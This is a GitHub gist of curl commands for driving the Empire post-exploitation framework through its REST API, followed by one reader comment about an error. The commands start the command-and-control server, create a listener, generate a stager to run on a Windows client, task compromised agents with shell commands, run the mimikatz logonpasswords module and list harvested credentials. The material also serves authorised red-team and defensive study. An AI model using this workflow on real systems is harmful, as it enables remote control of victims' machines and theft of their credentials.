Skip to content

Instantly share code, notes, and snippets.



Last active Mar 20, 2020
What would you like to do?
Empire RESTful API usage
# start empire headless with the specified API username and password
./empire --headless --username empireadmin --password 'Password123!'
# login and the current server token
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/admin/login -X POST -d '{"username":"empireadmin", "password":"Password123!"}'
# store the token in a variable
# see listener options
curl --insecure -i https://localhost:1337/api/listeners/options?token=$TOKEN
# create a listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/listeners?token=$TOKEN -X POST -d '{"Name":"testing"}'
# verify listener was created
curl --insecure -i https://localhost:1337/api/listeners?token=$TOKEN
# get the stager for this listener
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/stagers?token=$TOKEN -X POST -d '{"StagerName":"launcher", "Listener":"testing"}'
# execute stager on a Windows client
# see registered agents
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN
# grab the agent name and store it in a variable
# task the agent to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/shell?token=$TOKEN -X POST -d '{"command":"whoami"}'
# task all agents to run a shell command
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/shell?token=$TOKEN -X POST -d '{"command":"pwd"}'
# task the agent to run a module
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/modules/credentials/mimikatz/logonpasswords?token=$TOKEN -X POST -d "{\"Agent\":\"$AGENT\"}"
# clear all agent taskings
# curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/all/clear?token=$TOKEN
# get agent results
curl --insecure -i https://localhost:1337/api/agents/$AGENT/results?token=$TOKEN
# get all agent results
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN
# clear all agent result buffers
curl --insecure -i https://localhost:1337/api/agents/all/results?token=$TOKEN -X DELETE
# see stored credentials
curl --insecure -i https://localhost:1337/api/creds?token=$TOKEN
# rename the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/$AGENT/rename?token=$TOKEN -X POST -d '{"newname":"newagent"}'
# kill the agent
curl --insecure -i -H "Content-Type: application/json" https://localhost:1337/api/agents/newagent/kill?token=$TOKEN -X POST
# confirm kill
curl --insecure -i https://localhost:1337/api/agents?token=$TOKEN
# get any stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN
# remove stale agents
curl --insecure -i https://localhost:1337/api/agents/stale?token=$TOKEN -X DELETE
# restart the server
curl --insecure -i https://localhost:1337/api/admin/restart?token=$TOKEN
# kill all listeners
curl --insecure -i https://localhost:1337/api/listeners/all?token=$TOKEN -X DELETE
# shut down the server
curl --insecure -i https://localhost:1337/api/admin/shutdown?token=$TOKEN

This comment has been minimized.

Copy link

@rajiv2790 rajiv2790 commented May 2, 2018

When I do a POST to create a listener, I am getting the error message "Method not allowed". I think you have missed the listener type in the POST URL.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.